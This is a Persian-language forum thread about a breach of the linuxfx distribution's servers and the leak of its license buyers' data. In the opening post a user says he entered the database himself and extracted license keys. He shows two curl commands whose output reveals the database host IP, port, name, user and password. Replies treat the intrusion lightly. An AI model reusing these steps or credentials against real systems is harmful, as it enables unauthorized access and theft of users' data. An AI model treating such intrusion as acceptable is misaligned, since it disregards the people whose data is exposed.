لو رفتن اطلاعات تمام خریداران لایسنس linuxfx

[ɴɪᴍᴀ]

سلام
دیشب برای دومین بار گروه هکری kernal تونستن به سرور های linuxfx به راحتی وارد بشن و بازم تمام اطلاعات کاربرانش رو دانلود کنن، این کار اونقدر ساده بود که خیلیا هم وارد دیتابیس شدن و نابودش کردن   
منم دیشب وارد شدم و اطلاعات زیادی رو تونستم استخراج کنم! و با یه regex ساده از توی اطلاعات لایسنس کی هارو در اوردم که دارید میبینید:




شما براحتی در اون زمان میتونستید همه اطلاعات دیتابیس رو اینجوری بگیرید:

کد: [انتخاب]

$ curl http://www.linuxfx.org/linuxfx/x86/11.1/.http
mysql
19708
181.215.242.77
newbase
fxuser
$ curl http://www.linuxfx.org/linuxfx/x86/11.1/.https
99D28/gQxU%WY

و وارد دیتابیس بشید!
و البته که الان دیگه این روش کار نمیکنه و بجاش به گروه kernal گفتن احمق : )




خلاصه دیگه از این اتفاق درس بگیرید و از توزیع های بدنام و نا امن استفاده نکنید!

و در آخر این پست تو ماستودون من: https://qoto.org/web/statuses/108372956301377147
پست (پارت دوم) در سایت کرنال: https://kernal.eu/posts/linuxfx-part-2/
و پارت اول: https://kernal.eu/posts/linuxfx/

[سودو.]

افرین

[ɴɪᴍᴀ]

مرسی :| 

[جعفر فرقانلوژ]

الان میان میبرنت 

[ɴɪᴍᴀ]

چرا؟ استفاده بدی ازش نکردم که!

[سودو.]

نیما کلاه سفیده مهرداد 😉

[جعفر فرقانلوژ]

   تا جایی که من میبینم فقط تیشرتش سفیده کلاه هم نداره 

[🇬🇧بریتانیای کبیر🇬🇧]

سلام
دیشب برای دومین بار گروه هکری kernal تونستن به سرور های linuxfx به راحتی وارد بشن و بازم تمام اطلاعات کاربرانش رو دانلود کنن، این کار اونقدر ساده بود که خیلیا هم وارد دیتابیس شدن و نابودش کردن   
منم دیشب وارد شدم و اطلاعات زیادی رو تونستم استخراج کنم! و با یه regex ساده از توی اطلاعات لایسنس کی هارو در اوردم که دارید میبینید:

خب یعنی الآن اینا از توزیع linuxfx  استفاده کردند ؟ و چرا هکش کردند؟

[ɴɪᴍᴀ]

نه، داشتن بررسیش میکردن که به امنیت بالاش پی بردن (دارید میبینید خودتون) 

[🇬🇧بریتانیای کبیر🇬🇧]

برای سرورشون از لینوکس خودشون استفاده کردند؟